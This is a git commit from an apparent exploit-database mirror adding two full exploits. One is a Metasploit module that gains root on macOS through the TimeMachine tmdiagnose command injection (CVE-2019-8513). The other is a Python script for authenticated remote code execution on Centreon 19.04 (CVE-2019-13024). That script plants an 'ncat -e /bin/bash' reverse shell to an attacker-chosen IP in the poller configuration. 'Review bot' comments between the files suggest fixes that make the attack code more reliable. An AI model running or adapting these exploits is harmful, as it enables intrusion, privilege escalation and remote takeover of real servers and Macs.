DB: 2019-07-03
2 changes to exploits/shellcodes Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit) Linux Mint 18.3-19.1 - 'yelp' Command Injection Linux Mint 18.3-19.1 - 'yelp' Command Injection (Metasploit) Centreon 19.04 - Remote Code Execution Linux/x86 - execve /bin/sh using JMP-CALL-POP Shellcode (21 bytes) Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)
This commit is contained in:
parent
4afcc04eda
commit
808010b53f
4 changed files with 210 additions and 2 deletions
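--- a/exploits/macos/local/47070.rb
+++ b/exploits/macos/local/47070.rb
@@ -0,0 +1,105 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+Rank = ExcellentRanking
+
+include Msf::Post::File
+include Msf::Post::OSX::Priv
+include Msf::Post::OSX::System
+include Msf::Exploit::EXE
+include Msf::Exploit::FileDropper
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Mac OS X TimeMachine (tmdiagnose) Command Injection Privilege Escalation',
+'Description' => %q{
+This module exploits a command injection in TimeMachine on macOS <= 10.14.3 in
+order to run a payload as root. The tmdiagnose binary on OSX <= 10.14.3 suffers
+from a command injection vulnerability that can be exploited by creating a
+specially crafted disk label.
+
+The tmdiagnose binary uses awk to list every mounted volume, and composes
+shell commands based on the volume labels. By creating a volume label with the
+backtick character, we can have our own binary executed with root priviledges.
+},
+'License' => MSF_LICENSE,
+'Author' => [
+'CodeColorist', # Discovery and exploit
+'timwr', # Metasploit module
+],
+'References' => [
+['CVE', '2019-8513'],
+['URL', 'https://medium.com/0xcc/rootpipe-reborn-part-i-cve-2019-8513-timemachine-root-command-injection-47e056b3cb43'],
+['URL', 'https://support.apple.com/en-in/HT209600'],
+['URL', 'https://github.com/ChiChou/sploits'],
+],
+'DefaultTarget' => 0,
+'DefaultOptions' => { 'WfsDelay' => 300, 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },
+'Targets' => [
+[ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
+[ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
+[ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
+],
+'DisclosureDate' => 'Apr 13 2019'))
+register_advanced_options [
+OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+]
+end
+
+def upload_executable_file(filepath, filedata)
+print_status("Uploading file: '#{filepath}'")
+write_file(filepath, filedata)
+chmod(filepath)
+register_file_for_cleanup(filepath)
+end
+
+def check
+version = Gem::Version.new(get_system_version)
+if version >= Gem::Version.new('10.14.4')
+CheckCode::Safe
+else
+CheckCode::Appears
+end
+end
+
+def exploit
+if check != CheckCode::Appears
+fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+end
+
+if is_root?
+fail_with Failure::BadConfig, 'Session already has root privileges'
+end
+
+unless writable? datastore['WritableDir']
+fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
+end
+
+exploit_data = File.binread(File.join(Msf::Config.data_directory, "exploits", "CVE-2019-8513", "exploit" ))
+if target['Arch'] == ARCH_X64
+root_cmd = payload.encoded
+else
+root_cmd = payload.raw
+if target['Arch'] == ARCH_PYTHON
+root_cmd = "echo \"#{root_cmd}\" | python"
+end
+root_cmd = "CMD:#{root_cmd}"
+end
+if root_cmd.length > 1024
+fail_with Failure::PayloadFailed, "Payload size (#{root_cmd.length}) exceeds space in payload placeholder"
+end
+
+placeholder_index = exploit_data.index('ROOT_PAYLOAD_PLACEHOLDER')
+exploit_data[placeholder_index, root_cmd.length] = root_cmd
+
+exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text::rand_text_alpha_lower(6..12)}"
+upload_executable_file(exploit_file, exploit_data)
+
+print_status("Executing exploit '#{exploit_file}'")
+result = cmd_exec(exploit_file)
+print_status("Exploit result:\n#{result}")
+end
+end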
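Review bot: `exploit_data.index('ROOT_PAYLOAD_PLACEHOLDER')` in `exploit` is used unchecked, so a data file without the marker leaves `placeholder_index` nil and the slice assignment on the next line raises a TypeError instead of a readable failure; add `fail_with Failure::NotFound, 'ROOT_PAYLOAD_PLACEHOLDER not found in exploit data file' if placeholder_index.nil?` before it. The 1024 space check and the slice both use `String#length`, which counts characters, while the quantity actually overwritten in the binary file is bytes, so `root_cmd.bytesize` is the safer measure in both places. `check` passes `get_system_version` straight to `Gem::Version.new`, which raises ArgumentError on nil or a non-version string; returning `CheckCode::Unknown` in that case would keep `check` from aborting the module. Minor: the Description string spells "privileges" as "priviledges".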
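--- a/exploits/php/webapps/47069.py
+++ b/exploits/php/webapps/47069.py
@@ -0,0 +1,101 @@
+#!/usr/bin/python
+
+'''
+# Exploit Title: Centreon v19.04 authenticated Remote Code Execution
+# Date: 28/06/2019
+# Exploit Author: Askar (@mohammadaskar2)
+# CVE : CVE-2019-13024
+# Vendor Homepage: https://www.centreon.com/
+# Software link: https://download.centreon.com
+# Version: v19.04
+# Tested on: CentOS 7.6 / PHP 5.4.16
+'''
+
+import requests
+import sys
+import warnings
+from bs4 import BeautifulSoup
+
+# turn off BeautifulSoup warnings
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+
+if len(sys.argv) != 6:
+print(len(sys.argv))
+print("[~] Usage : ./centreon-exploit.py url username password ip port")
+exit()
+
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+ip = sys.argv[4]
+port = sys.argv[5]
+
+
+request = requests.session()
+print("[+] Retrieving CSRF token to submit the login form")
+page = request.get(url+"/index.php")
+html_content = page.text
+soup = BeautifulSoup(html_content)
+token = soup.findAll('input')[3].get("value")
+
+login_info = {
+"useralias": username,
+"password": password,
+"submitLogin": "Connect",
+"centreon_token": token
+}
+login_request = request.post(url+"/index.php", login_info)
+print("[+] Login token is : {0}".format(token))
+if "Your credentials are incorrect." not in login_request.text:
+print("[+] Logged In Sucssfully")
+print("[+] Retrieving Poller token")
+
+poller_configuration_page = url + "/main.get.php?p=60901"
+get_poller_token = request.get(poller_configuration_page)
+poller_html = get_poller_token.text
+poller_soup = BeautifulSoup(poller_html)
+poller_token = poller_soup.findAll('input')[24].get("value")
+print("[+] Poller token is : {0}".format(poller_token))
+
+payload_info = {
+"name": "Central",
+"ns_ip_address": "127.0.0.1",
+# this value should be 1 always
+"localhost[localhost]": "1",
+"is_default[is_default]": "0",
+"remote_id": "",
+"ssh_port": "22",
+"init_script": "centengine",
+# this value contains the payload , you can change it as you want
+"nagios_bin": "ncat -e /bin/bash {0} {1} #".format(ip, port),
+"nagiostats_bin": "/usr/sbin/centenginestats",
+"nagios_perfdata": "/var/log/centreon-engine/service-perfdata",
+"centreonbroker_cfg_path": "/etc/centreon-broker",
+"centreonbroker_module_path": "/usr/share/centreon/lib/centreon-broker",
+"centreonbroker_logs_path": "",
+"centreonconnector_path": "/usr/lib64/centreon-connector",
+"init_script_centreontrapd": "centreontrapd",
+"snmp_trapd_path_conf": "/etc/snmp/centreon_traps/",
+"ns_activate[ns_activate]": "1",
+"submitC": "Save",
+"id": "1",
+"o": "c",
+"centreon_token": poller_token,
+
+
+}
+
+send_payload = request.post(poller_configuration_page, payload_info)
+print("[+] Injecting Done, triggering the payload")
+print("[+] Check your netcat listener !")
+generate_xml_page = url + "/include/configuration/configGenerate/xml/generateFiles.php"
+xml_page_data = {
+"poller": "1",
+"debug": "true",
+"generate": "true",
+}
+request.post(generate_xml_page, xml_page_data)
+
+else:
+print("[-] Wrong credentials")
+exit()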
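Review bot: `print(len(sys.argv))` on the usage path reads as a leftover debug statement and should be dropped, and both error paths end in a bare `exit()`, which returns status 0; `sys.exit(1)` would let a caller tell failure from success. The login check keys only on the literal `"Your credentials are incorrect."` appearing in the response body, so any other failure response (a redirect, a localized message, an error page) is reported as logged in — and that message is misspelled as `[+] Logged In Sucssfully`. The header docstring should state that the script rewrites the poller configuration with id 1 (its `nagios_bin` field) and that this change persists on the target after the run. The hard-coded `[3]` and `[24]` indices into `findAll('input')` raise IndexError rather than a clear message whenever the page layout differs, and `send_payload` and `login_request` are assigned but the responses are never checked for status.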
@ -10563,6 +10563,7 @@ id,file,description,date,author,type,platform,port
|
||||||
47009,exploits/linux/local/47009.c,"Serv-U FTP Server < 15.1.7 - Local Privilege Escalation",2019-06-18,"Guy Levin",local,linux,
|
47009,exploits/linux/local/47009.c,"Serv-U FTP Server < 15.1.7 - Local Privilege Escalation",2019-06-18,"Guy Levin",local,linux,
|
||||||
47012,exploits/windows/local/47012.py,"Tuneclone 2.20 - Local SEH Buffer Overflow",2019-06-20,Achilles,local,windows,
|
47012,exploits/windows/local/47012.py,"Tuneclone 2.20 - Local SEH Buffer Overflow",2019-06-20,Achilles,local,windows,
|
||||||
47017,exploits/linux/local/47017.rb,"Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)",2019-06-20,Metasploit,local,linux,
|
47017,exploits/linux/local/47017.rb,"Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)",2019-06-20,Metasploit,local,linux,
|
||||||
|
47070,exploits/macos/local/47070.rb,"Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)",2019-07-02,Metasploit,local,macos,
|
||||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||||
|
@ -17515,7 +17516,7 @@ id,file,description,date,author,type,platform,port
|
||||||
47030,exploits/multiple/remote/47030.py,"SuperDoctor5 - 'NRPE' Remote Code Execution",2019-06-25,"Simon Gurney",remote,multiple,
|
47030,exploits/multiple/remote/47030.py,"SuperDoctor5 - 'NRPE' Remote Code Execution",2019-06-25,"Simon Gurney",remote,multiple,
|
||||||
47031,exploits/hardware/remote/47031.py,"SAPIDO RB-1732 - Remote Command Execution",2019-06-25,k1nm3n.aotoi,remote,hardware,
|
47031,exploits/hardware/remote/47031.py,"SAPIDO RB-1732 - Remote Command Execution",2019-06-25,k1nm3n.aotoi,remote,hardware,
|
||||||
47039,exploits/linux/remote/47039.rb,"Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit)",2019-06-26,Metasploit,remote,linux,
|
47039,exploits/linux/remote/47039.rb,"Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit)",2019-06-26,Metasploit,remote,linux,
|
||||||
47047,exploits/linux/remote/47047.rb,"Linux Mint 18.3-19.1 - 'yelp' Command Injection",2019-07-01,b1ack0wl,remote,linux,
|
47047,exploits/linux/remote/47047.rb,"Linux Mint 18.3-19.1 - 'yelp' Command Injection (Metasploit)",2019-07-01,b1ack0wl,remote,linux,
|
||||||
47067,exploits/hardware/remote/47067.py,"FaceSentry Access Control System 6.4.8 - Remote SSH Root",2019-07-01,LiquidWorm,remote,hardware,
|
47067,exploits/hardware/remote/47067.py,"FaceSentry Access Control System 6.4.8 - Remote SSH Root",2019-07-01,LiquidWorm,remote,hardware,
|
||||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||||
|
@ -41452,3 +41453,4 @@ id,file,description,date,author,type,platform,port
|
||||||
47064,exploits/hardware/webapps/47064.txt,"FaceSentry Access Control System 6.4.8 - Remote Command Injection",2019-07-01,LiquidWorm,webapps,hardware,
|
47064,exploits/hardware/webapps/47064.txt,"FaceSentry Access Control System 6.4.8 - Remote Command Injection",2019-07-01,LiquidWorm,webapps,hardware,
|
||||||
47065,exploits/hardware/webapps/47065.txt,"FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery",2019-07-01,LiquidWorm,webapps,hardware,
|
47065,exploits/hardware/webapps/47065.txt,"FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery",2019-07-01,LiquidWorm,webapps,hardware,
|
||||||
47066,exploits/hardware/webapps/47066.py,"FaceSentry Access Control System 6.4.8 - Remote Root Exploit",2019-07-01,LiquidWorm,webapps,hardware,
|
47066,exploits/hardware/webapps/47066.py,"FaceSentry Access Control System 6.4.8 - Remote Root Exploit",2019-07-01,LiquidWorm,webapps,hardware,
|
||||||
|
47069,exploits/php/webapps/47069.py,"Centreon 19.04 - Remote Code Execution",2019-07-02,Askar,webapps,php,
|
||||||
|
|
|
|
@ -986,4 +986,4 @@ id,file,description,date,author,type,platform
|
||||||
47055,shellcodes/arm/47055.c,"Linux/ARM64 - mmap() + read() stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (60 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
|
47055,shellcodes/arm/47055.c,"Linux/ARM64 - mmap() + read() stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (60 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
|
||||||
47056,shellcodes/arm/47056.c,"Linux/ARM64 - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (8 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
|
47056,shellcodes/arm/47056.c,"Linux/ARM64 - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (8 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
|
||||||
47057,shellcodes/arm/47057.c,"Linux/ARM64 - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (48 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
|
47057,shellcodes/arm/47057.c,"Linux/ARM64 - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (48 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm
|
||||||
47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve /bin/sh using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,kiriknik,shellcode,linux_x86
|
47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,kiriknik,shellcode,linux_x86
|
||||||
|
|
|